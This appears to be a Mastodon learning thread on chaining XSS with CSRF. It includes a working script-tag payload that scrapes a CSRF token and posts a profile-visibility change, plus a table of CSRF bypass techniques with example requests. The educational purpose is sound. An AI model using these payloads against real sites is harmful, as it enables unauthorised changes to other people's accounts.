ZaniddJul 15, 2024

In todays episode of "let's spam my timeline with what I'm learning":

#xss and #csrf or more concrete: XSS & CSRF Chaining.

If you missed the last couple of threads about session security, you can check them out here: https://infosec.exchange/@h_ackerman/112762434910128402

Or read up on them in my public learning notes: https://notes.zanidd.xyz/cybersecurity-and-hacking/web/session-security

So, let's start.

1/? ๐Ÿงต

#hacking #cybersecurity #csrf #crosssiterequestforgery #xss #crosssitescripting #pentesting

Zanidd (@[email protected])

Alright, time to learn some more about session security, #csrf and #xss If you missed my last thread about session security, you can read up on it here: https://infosec.exchange/@h_ackerman/112719081794761720 Or read about it in my notes: https://notes.zanidd.xyz/cybersecurity-and-hacking/web/session-security Let's start 1/? ๐Ÿงต #hacking #cybersecurity

Infosec Exchange
Show threadZaniddJul 15, 2024

To illustrate this technique we have a webapp that features same origin/same site protections as well as anti-csrf measures, but is vulnerable to an XSS attack.

#xss #csrf #hacking #cybersecurity #crosssiterequestforgery #crosssitescripting #pentesting

Show threadZaniddJul 15, 2024

Essentially, we store the CSRF payload/attack on the website using XSS

#xss #csrf #hacking #cybersecurity #crosssiterequestforgery #crosssitescripting #pentesting

Show threadZaniddJul 15, 2024

But before we hack away, we have to consider what we want to hack. In this example, we will use the exploit to make private profiles public - fancy.

#xss #csrf #hacking #cybersecurity #crosssiterequestforgery #crosssitescripting #pentesting

Show threadZaniddJul 15, 2024

So let's see how this app makes our profile public - by just playing around and making our profile public and sending the generated traffic to burp

#xss #csrf #hacking #cybersecurity #crosssiterequestforgery #crosssitescripting #pentesting

Show threadZaniddJul 15, 2024

In order to execute this request, we have to "smuggle" this JS Code into the website (using xss):

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/app/change-visibility',true);
req.send();
function handleResponse(d) {
var token = this.responseText.match(/name="csrf" type="hidden" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/app/change-visibility', true);
changeReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
changeReq.send('csrf='+token+'&action=change');
};
</script

#xss #csrf #hacking #cybersecurity #crosssiterequestforgery #crosssitescripting #pentesting

Show threadZaniddJul 15, 2024

Most of the script above is to replicate the request, if you're familiar with js it shouldn't be that hard/surprising and I'm sure burp has some kind of feature or extension to convert a request into JavaScript Code.

But the interesting part (for me at least) is this line:

var token = this.responseText.match(/name="csrf" type="hidden" value="(\w+)"/)[1];

This line parses the html of the website that is currently open and matches a regex-like expression. This expression looks for a line with the attributes name=csrf and type=hiden and extracts the value: our csrf token.

So even if it's randomly generated, we can get it  

#xss #csrf #hacking #cybersecurity #crosssiterequestforgery #crosssitescripting #pentesting

Show threadZaniddJul 15, 2024

Also let's not forget that weak csrf tokens happen also (very often?)

  • Try to find how tokens are generated (i.e. md5(username) we could verify check that by logging in and seeing our csrf tokens)

Check for the following and similar "token generation algorithms":

  • md5(username)
  • sha1(username)
  • md5(current date + username)

This can be done with a simple bash command:

echo -n <username> | md5sum

etc...

#xss #csrf #hacking #cybersecurity #crosssiterequestforgery #crosssitescripting #pentesting

Show threadZanidd

A little overview of protection bypasses

| Type | Explanation | Example |
| -------------------------------- | ------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| Null Value | Just leave the token Empty, Sometimes Server just checks for the headers | CSRF-Token: |
| Random CSRF Token | Recreate a fake token with random values | Real:

CSRF-Token: 9cfffd9e8e78bd68975e295d1b3d3331

Fake:

CSRF-Token: 9cfffl3dj3837dfkj3j387fjcxmfjfd3 |
| Use another Session's CSRF Token | Create multiple accounts and try the csrf token of Account A for a Request of Account B | - |
| Request Method Tampering | Change the request type from. GET to POST | Original

http<br>POST /change_password<br>POST body:<br>new_password=pwned&confirm_new=pwned<br>

Fake

http<br>GET /change_password?new_password=pwned&confirm_new=pwned<br> |
| Delete token | Just remove the token in general. Do not send token (it may work) | |
| Session Fixation | If website keeps anti-csrf token in cookie and params, it probably isn't keeping the token on the server so just fix your token | http<br>POST /change_password<br>Cookie: CSRF-Token=fixed_token;<br>POST body:<br>new_password=pwned&CSRF-Token=fixed_token<br> |
| Regex Bypass | You can try to bypass Regex checks for website whitelists etc... | www.google.com.pwned.zanidd.xyz or something like that |

Don't know how good mastodon handles markdown tables, but you can see it at https://notes.zanidd.xyz/cybersecurity-and-hacking/web/session-security a little better.

#xss #csrf #hacking #cybersecurity #crosssiterequestforgery #crosssitescripting #pentesting

Jul 15, 2024 at 12:28pmWeb
Show threadZaniddJul 15, 2024

Alrighty, thanks for joining in on this thread! We will see us in the next one - I'll be spending the next hour trying to move my old notes to my public notes ๐ŸŒŸ

#xss #csrf #hacking #cybersecurity #crosssiterequestforgery #crosssitescripting #pentesting